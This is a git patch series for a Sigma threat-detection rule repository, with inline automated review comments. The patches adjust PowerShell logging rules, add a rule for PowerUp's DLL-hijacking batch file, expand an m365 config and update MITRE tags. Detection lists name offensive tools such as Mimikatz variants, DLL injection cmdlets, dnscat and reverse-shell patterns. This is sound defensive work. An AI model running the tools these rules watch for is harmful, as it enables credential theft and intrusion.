diff --git a/rules/windows/powershell/powershell_code_injection.yml b/rules/windows/create_remote_thread/sysmon_powershell_code_injection.yml similarity index 100% rename from rules/windows/powershell/powershell_code_injection.yml rename to rules/windows/create_remote_thread/sysmon_powershell_code_injection.yml diff --git a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml index 8a0fa3a3..cc7de5f4 100644 --- a/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml +++ b/rules/windows/powershell/powershell_CL_Mutexverifiers_LOLScript_v2.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection2: EventID: 4104 diff --git a/rules/windows/powershell/powershell_create_local_user.yml b/rules/windows/powershell/powershell_create_local_user.yml index 6fd05f5c..29961866 100644 --- a/rules/windows/powershell/powershell_create_local_user.yml +++ b/rules/windows/powershell/powershell_create_local_user.yml @@ -17,7 +17,7 @@ modified: 2021/08/04 logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_data_compressed.yml b/rules/windows/powershell/powershell_data_compressed.yml index ada73d64..72ba0304 100644 --- a/rules/windows/powershell/powershell_data_compressed.yml +++ b/rules/windows/powershell/powershell_data_compressed.yml @@ -10,7 +10,7 @@ references: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 
diff --git a/rules/windows/powershell/powershell_dnscat_execution.yml b/rules/windows/powershell/powershell_dnscat_execution.yml index 63a590f3..bfe388a4 100644 --- a/rules/windows/powershell/powershell_dnscat_execution.yml +++ b/rules/windows/powershell/powershell_dnscat_execution.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_icmp_exfiltration.yml b/rules/windows/powershell/powershell_icmp_exfiltration.yml index c6e83568..a9d9036a 100644 --- a/rules/windows/powershell/powershell_icmp_exfiltration.yml +++ b/rules/windows/powershell/powershell_icmp_exfiltration.yml @@ -12,7 +12,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_nightmare.yml b/rules/windows/powershell/powershell_invoke_nightmare.yml index 9d7443ed..64e93f5a 100644 --- a/rules/windows/powershell/powershell_invoke_nightmare.yml +++ b/rules/windows/powershell/powershell_invoke_nightmare.yml @@ -9,7 +9,7 @@ author: Max Altgelt, Tobias Michalski logsource: product: windows service: powershell - definition: It is recommended to use the new "Script Block Logging" of PowerShell v5. + definition: Script Block Logging must be enable detection: selection: EventID: 4104 diff --git a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml b/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml index 5b638d94..330912c9 100644 --- a/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml +++ b/rules/windows/powershell/powershell_invoke_obfuscation_via_stdin.yml 
@@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 'Script block logging must be enabled' + definition: Script block logging must be enabled for 4104, Module Logging must be enable for 4103 detection: selection_1: EventID: 4104 diff --git a/rules/windows/powershell/powershell_malicious_commandlets.yml b/rules/windows/powershell/powershell_malicious_commandlets.yml index ad4609d8..34c4ccb0 100644 --- a/rules/windows/powershell/powershell_malicious_commandlets.yml +++ b/rules/windows/powershell/powershell_malicious_commandlets.yml @@ -10,13 +10,13 @@ tags: - attack.t1086 #an old one author: Sean Metcalf (source), Florian Roth (rule), Bartlomiej Czyz @bczyz1 (update), oscd.community (update) date: 2017/03/05 -modified: 2020/10/11 +modified: 2021/08/21 logsource: product: windows service: powershell - definition: 'It is recommended to use the new "Script Block Logging" of PowerShell v5 https://adsecurity.org/?p=2277' + definition: Script Block Logging must be enable detection: - keywords: + select_Malicious: EventID: 4104 ScriptBlockText|contains: - "Invoke-DllInjection" @@ -115,10 +115,8 @@ detection: - "Invoke-Mimikittenz" - "Invoke-AllChecks" false_positives: - EventID: 4104 - ScriptBlockText|contains: - - Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1 - condition: keywords and not false_positives + ScriptBlockText|contains: Get-SystemDriveInfo # http://bheltborg.dk/Windows/WinSxS/amd64_microsoft-windows-maintenancediagnostic_31bf3856ad364e35_10.0.10240.16384_none_91ef7543a4514b5e/CL_Utility.ps1 + condition: select_Malicious and not false_positives falsepositives: - Penetration testing level: high 
diff --git a/rules/windows/powershell/powershell_cmdline_reversed_strings.yml b/rules/windows/process_creation/win_powershell_cmdline_reversed_strings.yml similarity index 100% rename from rules/windows/powershell/powershell_cmdline_reversed_strings.yml rename to rules/windows/process_creation/win_powershell_cmdline_reversed_strings.yml diff --git a/rules/windows/powershell/powershell_cmdline_special_characters.yml b/rules/windows/process_creation/win_powershell_cmdline_special_characters.yml similarity index 100% rename from rules/windows/powershell/powershell_cmdline_special_characters.yml rename to rules/windows/process_creation/win_powershell_cmdline_special_characters.yml diff --git a/rules/windows/powershell/powershell_cmdline_specific_comb_methods.yml b/rules/windows/process_creation/win_powershell_cmdline_specific_comb_methods.yml similarity index 100% rename from rules/windows/powershell/powershell_cmdline_specific_comb_methods.yml rename to rules/windows/process_creation/win_powershell_cmdline_specific_comb_methods.yml From 2f683b9ab79604228b4dfd5113467ab90b370457 Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 10:00:48 +0200 Subject: [PATCH 0485/1367] fix powershell_clear_powershell_history error --- .../windows/powershell/powershell_clear_powershell_history.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_clear_powershell_history.yml b/rules/windows/powershell/powershell_clear_powershell_history.yml index ff01b153..430e9305 100644 --- a/rules/windows/powershell/powershell_clear_powershell_history.yml +++ b/rules/windows/powershell/powershell_clear_powershell_history.yml @@ -14,7 +14,7 @@ tags: logsource: product: windows service: powershell - definition: 4104 Script block logging must be enabled , 4103 Module Logging must be enabled + definition: 4104 Script block logging must be enabled , 4103 Module Logging must be enabled detection: selection_1: EventID: 4104 
From 42c90b9d20e4dad422b5b46e50a4944480641cac Mon Sep 17 00:00:00 2001 From: frack113 Date: Sat, 21 Aug 2021 10:05:47 +0200 Subject: [PATCH 0486/1367] fix powershell_psattack error --- rules/windows/powershell/powershell_psattack.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/powershell/powershell_psattack.yml b/rules/windows/powershell/powershell_psattack.yml index 78690987..8e178cb4 100644 --- a/rules/windows/powershell/powershell_psattack.yml +++ b/rules/windows/powershell/powershell_psattack.yml @@ -19,7 +19,7 @@ detection: selection: EventID: 4104 ScriptBlockText|contains: 'PS ATTACK!!!' - condition: all of them + condition: selection falsepositives: - Pentesters level: high From fba54b8d6921ec26d85b688e4e98f0134291730e Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sat, 21 Aug 2021 17:47:56 +0530 Subject: [PATCH 0487/1367] First Rule commit --- .../sysmon_detect_powerup_dllhijacking.yml | 24 +++++++++++++++++++ 1 file changed, 24 insertions(+) create mode 100644 rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml new file mode 100644 index 00000000..de9640df --- /dev/null +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml 
@@ -0,0 +1,24 @@ +title: Powerup Write Hijack DLL detection +id: 602a1f13-c640-4d73-b053-be9a2fa58b96 +status: experimental +description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference: https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ +author: pbssubhash +date: 2021/08/21 +modified: 2021/08/21 +tags: + - attack.persistence + - attack.privilege_escalation + - attack.defense_evasion + - attack.t1574.001 +logsource: + category: file_event + product: windows +detection: + selection: + Image|endswith: '\powershell.exe' + File.path|endswith: '.bat' + condition: selection +falsepositives: + - Pentest + - Any powershell script that creates bat files # highly unlikely (untested) +level: high From a415463f5b71d9ce8378eb8ef1e3802b08d3ea4a Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sat, 21 Aug 2021 19:37:28 +0530 Subject: [PATCH 0488/1367] Modified rule --- .../file_event/sysmon_detect_powerup_dllhijacking.yml | 5 ++--- 1 file changed, 2 insertions(+), 3 deletions(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index de9640df..326fb189 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml 
@@ -1,10 +1,9 @@ title: Powerup Write Hijack DLL detection id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental -description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference: https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ +description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ author: pbssubhash date: 2021/08/21 -modified: 2021/08/21 tags: - attack.persistence - attack.privilege_escalation @@ -16,7 +15,7 @@ logsource: detection: selection: Image|endswith: '\powershell.exe' - File.path|endswith: '.bat' + TargetFilename|endswith: '.bat' condition: selection falsepositives: - Pentest From 73c953d633b1433ba3e19f3512543098acdb7037 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 21 Aug 2021 16:18:16 +0200 Subject: [PATCH 0489/1367] Fix title --- rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 326fb189..8006f002 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml 
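Review bot: The new selection `TargetFilename|endswith: '.bat'` fires at level high on every .bat file written by powershell.exe, which is far broader than the description's own statement that Write-HijackDll drops `debug.bat` by default, and the rule's falsepositives comment admits the breadth is untested. Either narrow the match to the default artifact, `TargetFilename|endswith: '\debug.bat'`, or keep the broad match but lower `level` to medium and document it as a hunting rule in the description. If the environment runs PowerShell 7, its image name is not `powershell.exe` and would be missed by the `Image|endswith` clause, which may be worth noting. The `logsource` block sits between the two hunks on this line and is unchanged.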
@@ -1,4 +1,4 @@ -title: Powerup Write Hijack DLL detection +title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ From eee497f656bc470c45363a99fe5fa9404e584dc2 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sat, 21 Aug 2021 20:04:03 +0530 Subject: [PATCH 0490/1367] Title modification --- rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 326fb189..8006f002 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -1,4 +1,4 @@ -title: Powerup Write Hijack DLL detection +title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ From a44206bfa04a0357d5c223eee63bffd6e86725bb Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Sat, 21 Aug 2021 17:33:39 +0200 Subject: [PATCH 0491/1367] Some cleanup --- .../file_event/sysmon_detect_powerup_dllhijacking.yml | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) 
diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 8006f002..702dcf29 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -1,7 +1,12 @@ title: Powerup Write Hijack DLL id: 602a1f13-c640-4d73-b053-be9a2fa58b96 status: experimental -description: Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. In it's default mode, it builds a self deleting .bat file which executes malicious command. The detection rule relies on creation of the malicious bat file (debug.bat by default). Reference - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ +description: | + Powerup tool's Write Hijack DLL exploits DLL hijacking for privilege escalation. + In it's default mode, it builds a self deleting .bat file which executes malicious command. + The detection rule relies on creation of the malicious bat file (debug.bat by default). +references: + - https://powersploit.readthedocs.io/en/latest/Privesc/Write-HijackDll/ author: pbssubhash date: 2021/08/21 tags: From 645492cef56899253752216a909b6218bb6f8c25 Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Sat, 21 Aug 2021 14:57:38 -0500 Subject: [PATCH 0492/1367] Update m365.yml just working on expanding this. --- tools/config/generic/m365.yml | 5 +++++ 1 file changed, 5 insertions(+) diff --git a/tools/config/generic/m365.yml b/tools/config/generic/m365.yml index 51e08af6..fb816bd1 100644 --- a/tools/config/generic/m365.yml +++ b/tools/config/generic/m365.yml @@ -5,3 +5,8 @@ ThreatManagement: category: ThreatManagement conditions: eventSource: SecurityComplianceCenter +AccessGovernance: + product: m365 + category: AccessGovernance + conditions: + eventSource: SecurityComplianceCenter From 579a80411de1ec3c01b222d42c5b3fa857edc50a Mon Sep 17 00:00:00 2001 
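Review bot: The new `AccessGovernance` entry carries exactly the same condition as the existing `ThreatManagement` entry (`eventSource: SecurityComplianceCenter`), so a rule written against either category compiles to the identical filter and the category adds no selectivity. The same applies to the four categories added in the following patch (CloudDiscovery, DataLossPrevention, ThreatDetection, SharingControl), which all collapse to that one condition. If the categories are meant to be distinct, each needs a condition on a field that actually separates the records — in the Office 365 Management Activity schema that would presumably be `RecordType` or `Workload`, but confirm against the data source; otherwise a comment stating that the shared condition is a deliberate placeholder would stop rule authors from relying on a distinction that does not exist.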
From: Austin Songer Date: Sat, 21 Aug 2021 15:03:31 -0500 Subject: [PATCH 0493/1367] Update m365.yml --- tools/config/generic/m365.yml | 20 ++++++++++++++++++++ 1 file changed, 20 insertions(+) diff --git a/tools/config/generic/m365.yml b/tools/config/generic/m365.yml index fb816bd1..de769059 100644 --- a/tools/config/generic/m365.yml +++ b/tools/config/generic/m365.yml @@ -10,3 +10,23 @@ AccessGovernance: category: AccessGovernance conditions: eventSource: SecurityComplianceCenter +CloudDiscovery: + product: m365 + category: CloudDiscovery + conditions: + eventSource: SecurityComplianceCenter +DataLossPrevention: + product: m365 + category: DataLossPrevention + conditions: + eventSource: SecurityComplianceCenter +ThreatDetection: + product: m365 + category: ThreatDetection + conditions: + eventSource: SecurityComplianceCenter +SharingControl: + product: m365 + category: SharingControl + conditions: + eventSource: SecurityComplianceCenter From 6b66c0774cc8506c537771008ac225f75ae48db3 Mon Sep 17 00:00:00 2001 From: pbssubhash Date: Sun, 22 Aug 2021 10:10:12 +0530 Subject: [PATCH 0494/1367] Changing service to sysmon --- rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml index 702dcf29..bbb1219f 100644 --- a/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml +++ b/rules/windows/file_event/sysmon_detect_powerup_dllhijacking.yml @@ -15,7 +15,7 @@ tags: - attack.defense_evasion - attack.t1574.001 logsource: - category: file_event + service: sysmon product: windows detection: selection: From 7cd71b224036583a214f440f1d7308f24be4283a Mon Sep 17 00:00:00 2001 
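Review bot: Replacing `category: file_event` with `service: sysmon` removes the event-type constraint: `file_event` is the generic log source that the backend configurations map to the Sysmon file-create event (EventID 11), whereas `service: sysmon` alone selects every Sysmon event, so the `Image`/`TargetFilename` selection now also matches unrelated event types that carry those fields, and the rule no longer works with non-Sysmon file_event sources. Keep `category: file_event` and let the configuration do the Sysmon mapping; if a Sysmon-only variant is really wanted, add `service: sysmon` alongside the category rather than in place of it. The rest of the rule is outside the hunk.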
From: frack113 Date: Sun, 22 Aug 2021 08:57:07 +0200 Subject: [PATCH 0495/1367] fix yaml error --- tools/sigma/sigma2attack.py | 38 +++++++++++++++++++------------------ 1 file changed, 20 insertions(+), 18 deletions(-) diff --git a/tools/sigma/sigma2attack.py b/tools/sigma/sigma2attack.py index 165d077f..2f6ceafc 100755 --- a/tools/sigma/sigma2attack.py +++ b/tools/sigma/sigma2attack.py @@ -8,6 +8,7 @@ import sys import yaml + def main(): parser = argparse.ArgumentParser(formatter_class=argparse.ArgumentDefaultsHelpFormatter) parser.add_argument("--rules-directory", "-d", dest="rules_dir", default="rules", help="Directory to read rules from") 
@@ -20,24 +21,25 @@ def main(): curr_max_technique_count = 0 num_rules_used = 0 for rule_file in rule_files: - try: - rule = yaml.safe_load(open(rule_file, encoding="utf-8").read()) - except yaml.YAMLError: - sys.stderr.write("Ignoring rule " + rule_file + " (parsing failed)\n") - continue - if "tags" not in rule: - sys.stderr.write("Ignoring rule " + rule_file + " (no tags)\n") - continue - tags = rule["tags"] - for tag in tags: - if tag.lower().startswith("attack.t"): - technique_id = tag[len("attack."):].upper() - num_rules_used += 1 - if technique_id not in techniques_to_rules: - techniques_to_rules[technique_id] = [] - techniques_to_rules[technique_id].append(os.path.basename(rule_file)) - curr_max_technique_count = max(curr_max_technique_count, len(techniques_to_rules[technique_id])) - + with open(rule_file,encoding='utf-8') as f: + docs = yaml.load_all(f, Loader=yaml.FullLoader) + double = False + for rule in docs: + if "tags" not in rule : + if double == False : # Only 1 warning + sys.stderr.write("Ignoring rule " + rule_file + " (no tags)\n") + double = True # action globle no tag + continue + tags = rule["tags"] + double = True + for tag in tags: + if tag.lower().startswith("attack.t"): + technique_id = tag[len("attack."):].upper() + num_rules_used += 1 + if technique_id not in techniques_to_rules: + techniques_to_rules[technique_id] = [] + techniques_to_rules[technique_id].append(os.path.basename(rule_file)) + curr_max_technique_count = max(curr_max_technique_count, len(techniques_to_rules[technique_id])) scores = [] for technique in techniques_to_rules: From 295054dcbe0a362d7eed143b8f37c2b5b47a2eb5 Mon Sep 17 00:00:00 2001 
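Review bot: `yaml.load_all(f, Loader=yaml.FullLoader)` downgrades the parser from the `safe_load` the old code used — FullLoader accepts Python-specific tags that SafeLoader rejects and has had code-execution issues in older PyYAML releases — and the `except yaml.YAMLError` path was dropped, so one malformed rule file now aborts the whole run instead of being reported and skipped. Use `yaml.safe_load_all` and keep the handler; since `load_all` is lazy, the iteration must happen inside the `try`, hence the `list(...)` below. An empty YAML document yields `None`, on which `"tags" not in rule` raises `TypeError`, so a `if not rule: continue` guard is worth adding, and `if double == False :` reads better as `if not double:`. `main()` continues outside the hunk.
```python
    for rule_file in rule_files:
        with open(rule_file, encoding='utf-8') as f:
            try:
                docs = list(yaml.safe_load_all(f))
            except yaml.YAMLError:
                sys.stderr.write("Ignoring rule " + rule_file + " (parsing failed)\n")
                continue
        double = False
        for rule in docs:
            if not rule:
                continue
            # … unchanged: tags check and technique counting …
```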
From: SomeOne Date: Sun, 22 Aug 2021 13:57:56 +0200 Subject: [PATCH 0496/1367] Replace old mitre techniques by new one --- rules/linux/lnx_security_tools_disabling.yml | 2 +- rules/linux/lnx_sudo_cve_2019_14287.yml | 3 ++- rules/network/zeek/zeek_dns_mining_pools.yml | 3 ++- rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml | 3 ++- rules/web/win_powershell_snapins_hafnium.yml | 4 ++-- rules/web/win_webshell_regeorg.yml | 2 +- .../win_arbitrary_shell_execution_via_settingcontent.yml | 3 ++- rules/windows/builtin/win_event_log_cleared.yml | 3 ++- rules/windows/malware/av_webshell.yml | 2 +- rules/windows/powershell/powershell_bad_opsec_artifacts.yml | 2 +- .../powershell/powershell_remote_powershell_session.yml | 6 +++--- rules/windows/powershell/powershell_renamed_powershell.yml | 5 +++-- .../windows/process_access/sysmon_mimikatz_trough_winrm.yml | 6 +++--- .../win_bad_opsec_sacrificial_processes.yml | 2 +- .../win_credential_access_via_password_filter.yml | 3 ++- .../process_creation/win_lolbas_execution_of_wuauclt.yml | 5 +++-- .../win_modif_of_services_for_via_commandline.yml | 6 ++++-- .../process_creation/win_powershell_disable_windef_av.yml | 2 +- .../win_powershell_reverse_shell_connection.yml | 4 ++-- ...ticky_keys_unauthenticated_privileged_console_access.yml | 5 +++-- .../process_creation/win_susp_shell_spawn_from_mssql.yml | 3 ++- .../sysmon_registry_persistence_key_linking.yml | 3 ++- 22 files changed, 45 insertions(+), 32 deletions(-) diff --git a/rules/linux/lnx_security_tools_disabling.yml b/rules/linux/lnx_security_tools_disabling.yml index 8d1f1617..2fee4c8e 100644 --- a/rules/linux/lnx_security_tools_disabling.yml +++ b/rules/linux/lnx_security_tools_disabling.yml @@ -13,7 +13,7 @@ level: medium tags: - attack.defense_evasion - attack.t1562.004 - - attack.t1089 + - attack.t1089 # an old one --- logsource: category: process_creation 
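Review bot: The retired ID is kept as `- attack.t1089 # an old one`, but the YAML comment is invisible to tooling — sigma2attack (patched earlier in this series) counts every tag that starts with `attack.t`, so each rule touched here is credited to both the old and the new technique and deprecated IDs end up in the generated layer. The same pattern is used in every other hunk of this commit. If the old IDs must stay for consumers that have not moved to sub-techniques, either make the marker machine-readable or teach sigma2attack to skip annotated lines; otherwise drop the old tag lines outright.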
diff --git a/rules/linux/lnx_sudo_cve_2019_14287.yml b/rules/linux/lnx_sudo_cve_2019_14287.yml index bbd9d785..84ab95b7 100644 --- a/rules/linux/lnx_sudo_cve_2019_14287.yml +++ b/rules/linux/lnx_sudo_cve_2019_14287.yml @@ -18,7 +18,8 @@ level: critical tags: - attack.privilege_escalation - attack.t1068 - - attack.t1169 + - attack.t1169 # an old one + - attack.t1548.003 --- detection: selection_keywords: diff --git a/rules/network/zeek/zeek_dns_mining_pools.yml b/rules/network/zeek/zeek_dns_mining_pools.yml index 71003888..c43795db 100644 --- a/rules/network/zeek/zeek_dns_mining_pools.yml +++ b/rules/network/zeek/zeek_dns_mining_pools.yml @@ -10,7 +10,8 @@ logsource: service: dns product: zeek tags: - - attack.t1035 + - attack.t1035 # an old one + - attack.t1569.002 - attack.t1496 detection: selection: diff --git a/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml b/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml index 85306e0a..1690856f 100644 --- a/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml +++ b/rules/network/zeek/zeek_dns_suspicious_zbit_flag.yml @@ -10,7 +10,8 @@ references: - 'https://www.netresec.com/?page=Blog&month=2021-01&post=Finding-Targeted-SUNBURST-Victims-with-pDNS' author: '@neu5ron, SOC Prime Team, Corelight' tags: - - attack.t1094 + - attack.t1094 # an old one + - attack.t1095 - attack.t1043 - attack.command_and_control logsource: diff --git a/rules/web/win_powershell_snapins_hafnium.yml b/rules/web/win_powershell_snapins_hafnium.yml index 3c35f816..b51f2b83 100644 --- a/rules/web/win_powershell_snapins_hafnium.yml +++ b/rules/web/win_powershell_snapins_hafnium.yml @@ -10,8 +10,8 @@ date: 2021/03/03 modified: 2021/08/09 tags: - attack.execution - - attack.t1086 - - attack.t1059.005 + - attack.t1086 # an old one + - attack.t1059.001 - attack.collection - attack.t1114 logsource: diff --git a/rules/web/win_webshell_regeorg.yml b/rules/web/win_webshell_regeorg.yml index b4ccdb5c..2a2b89e4 100644 
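Review bot: In the zeek_dns_suspicious_zbit_flag hunk, `- attack.t1043` on the line after the new `attack.t1095` is left without the `# an old one` marker even though T1043 is also a deprecated technique in current ATT&CK, so the hunk is inconsistent with the convention it introduces. Either annotate it the same way, `  - attack.t1043 # an old one`, or remove it; as it stands a reader will assume it was reviewed and found current.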
--- a/rules/web/win_webshell_regeorg.yml +++ b/rules/web/win_webshell_regeorg.yml @@ -33,5 +33,5 @@ falsepositives: level: high tags: - attack.persistence - - attack.t1100 + - attack.t1100 # an old one - attack.t1505.003 diff --git a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml index 659c0e75..fffa3a9e 100644 --- a/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml +++ b/rules/windows/builtin/win_arbitrary_shell_execution_via_settingcontent.yml @@ -8,7 +8,8 @@ references: - https://posts.specterops.io/the-tale-of-settingcontent-ms-files-f1ea253e4d39 tags: - attack.t1204 - - attack.t1193 + - attack.t1193 # an old one + - attack.t1566.001 - attack.execution - attack.initial_access logsource: diff --git a/rules/windows/builtin/win_event_log_cleared.yml b/rules/windows/builtin/win_event_log_cleared.yml index e3a88f08..649d0d95 100644 --- a/rules/windows/builtin/win_event_log_cleared.yml +++ b/rules/windows/builtin/win_event_log_cleared.yml @@ -11,7 +11,8 @@ logsource: service: security product: windows tags: - - attack.t1107 + - attack.t1107 # an old one + - attack.t1070.001 detection: selection: EventID: 1102 diff --git a/rules/windows/malware/av_webshell.yml b/rules/windows/malware/av_webshell.yml index 3d9cc310..39960e1d 100644 --- a/rules/windows/malware/av_webshell.yml +++ b/rules/windows/malware/av_webshell.yml @@ -16,7 +16,7 @@ references: - https://www.virustotal.com/gui/file/b8702acf32fd651af9f809ed42d15135f842788cd98d81a8e1b154ee2a2b76a2/detection tags: - attack.persistence - - attack.t1100 + - attack.t1100 # an old one - attack.t1505.003 logsource: product: antivirus diff --git a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml b/rules/windows/powershell/powershell_bad_opsec_artifacts.yml index 98ec3052..64bc41c2 100644 --- a/rules/windows/powershell/powershell_bad_opsec_artifacts.yml 
+++ b/rules/windows/powershell/powershell_bad_opsec_artifacts.yml @@ -12,7 +12,7 @@ modified: 2020/10/09 tags: - attack.execution - attack.t1059.001 - - attack.t1086 + - attack.t1086 # an old one logsource: product: windows service: powershell diff --git a/rules/windows/powershell/powershell_remote_powershell_session.yml b/rules/windows/powershell/powershell_remote_powershell_session.yml index 237c546b..e8e29b1a 100644 --- a/rules/windows/powershell/powershell_remote_powershell_session.yml +++ b/rules/windows/powershell/powershell_remote_powershell_session.yml @@ -11,10 +11,10 @@ references: tags: - attack.execution - attack.t1059.001 - - attack.t1086 #an old one + - attack.t1086 # an old one - attack.lateral_movement - attack.t1021.006 - - attack.t1028 #an old one + - attack.t1028 # an old one falsepositives: - Legitimate use remote PowerShell sessions level: high @@ -39,4 +39,4 @@ detection: EventID: 400 HostName: 'ServerRemoteHost' HostApplication|contains: 'wsmprovhost.exe' - condition: selection \ No newline at end of file + condition: selection diff --git a/rules/windows/powershell/powershell_renamed_powershell.yml b/rules/windows/powershell/powershell_renamed_powershell.yml index 5b6304ef..d0d732e1 100644 --- a/rules/windows/powershell/powershell_renamed_powershell.yml +++ b/rules/windows/powershell/powershell_renamed_powershell.yml @@ -9,7 +9,8 @@ date: 2020/06/29 modified: 2021/08/18 tags: - attack.execution - - attack.t1086 + - attack.t1086 # an old one + - attack.t1059.001 logsource: product: windows service: powershell-classic @@ -25,4 +26,4 @@ detection: condition: selection and not filter falsepositives: - unknown -level: low \ No newline at end of file +level: low diff --git a/rules/windows/process_access/sysmon_mimikatz_trough_winrm.yml b/rules/windows/process_access/sysmon_mimikatz_trough_winrm.yml index c433c22d..cf5b00e4 100755 --- a/rules/windows/process_access/sysmon_mimikatz_trough_winrm.yml 
